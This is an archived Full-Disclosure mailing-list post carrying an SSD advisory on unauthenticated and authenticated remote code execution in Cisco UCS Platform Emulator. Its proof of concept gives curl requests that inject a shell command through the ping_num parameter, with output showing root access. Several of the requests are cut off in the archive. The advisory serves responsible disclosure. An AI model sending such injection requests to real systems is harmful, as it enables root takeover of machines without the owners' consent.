lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 1 Nov 2017 08:15:19 +0200
From: Maor Shwartz <>
Cc: SecuriTeam Secure Disclosure <>
Subject: [FD] SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

Full report:
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities
found in Cisco UCS Platform Emulator version 3.1(2ePE1).

Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled
into a virtual machine (VM). The VM includes software that emulates
hardware communications for the Cisco Unified Computing System (Cisco UCS)
hardware that is configured and managed by Cisco UCS Manager. For example,
you can use Cisco UCS Platform Emulator to create and test a supported
Cisco UCS configuration, or to duplicate an existing Cisco UCS environment
for troubleshooting or development purposes.

The vulnerabilities found in Cisco UCS Platform Emulator are:

Unauthenticated remote code execution
Authenticated remote code execution

An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released patches to address this vulnerability and issue the
following CVE:


Vulnerabilities details
Unauthenticated remote code execution
User controlled input is not sufficiently sanitized when passed to
IP/settings/ping function. An unauthenticated attacker can inject commands
via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root
on the remote machine.

Proof of Concept


curl "

curl -k "

curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr="

curl -k "


By sending one of the above requests the Cisco UCS will response with:


/sample output/


demo@...i:~/poc$ curl -k "

PING ( 56(84) bytes of data.

64 bytes from icmp_seq=1 ttl=64 time=0.017 ms

--- ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms

Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686
i686 i386 GNU/Linux

demo@...i:~/poc$ curl "

uid=0(root) gid=0(root) groups=0(root)


Maor Shwartz
Beyond Security
GPG Key ID: 93CC36E2DE7FF514

Download attachment "SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution – SecuriTeam Blogs.pdf" of type "application/pdf" (133308 bytes)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists